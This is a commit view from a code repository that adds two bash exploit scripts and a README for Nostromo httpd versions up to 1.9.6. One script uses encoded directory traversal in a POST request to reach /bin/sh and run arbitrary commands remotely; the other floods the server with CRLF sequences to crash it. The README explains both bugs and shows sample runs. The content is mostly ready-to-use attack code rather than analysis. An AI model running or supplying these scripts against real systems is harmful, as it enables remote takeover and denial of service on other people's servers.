Browse Source

First commit

master
sp0re 1 month ago
commit
c24998744b
3 changed files with 46 additions and 0 deletions
  1. 14
    0
      CVE-2019-16278.sh
  2. 7
    0
      CVE-2019-16279.sh
  3. 25
    0
      README.md

+ 14
- 0
CVE-2019-16278.sh View File

@@ -0,0 +1,14 @@
#!/usr/bin/env bash

HOST="$1"
PORT="$2"
shift 2

( \
echo -n -e 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n'; \
echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
echo "$@ 2>&1" \
) | nc "$HOST" "$PORT" \
| sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'



+ 7
- 0
CVE-2019-16279.sh View File

@@ -0,0 +1,7 @@
#!/usr/bin/env bash

HOST="$1"
PORT="$2"

echo -n -e '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n' | nc "$HOST" "$PORT"


+ 25
- 0
README.md View File

@@ -0,0 +1,25 @@
# Exploits for CVE-2019-16278 and CVE-2019-16279

Nostromo httpd is prone to 2 cricital vulnerabilities for versions <= 1.9.6 (0day =]) first one is an RCE through directory transversal, second one is a DoS

### [CVE-2019-16278](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278) - Directory transversal to remote code execution

This bug is due to an incomplete fix for [CVE-2011-0751](https://nvd.nist.gov/vuln/detail/CVE-2011-0751). We can bypass a check for `/../` which allows us to execute `/bin/sh` with arbitrary arguments.

Example

$ ./CVE-2019-16278.sh 127.0.0.1 8080 id
uid=1001(sp0re) gid=1001(sp0re) groups=1001(sp0re)


### [CVE-2019-16279](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16279) - Denial of Service

This bug exploit a memory error when sending too many `\r\n` in a single connexion.

Example

$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused

Loading…
Cancel
Save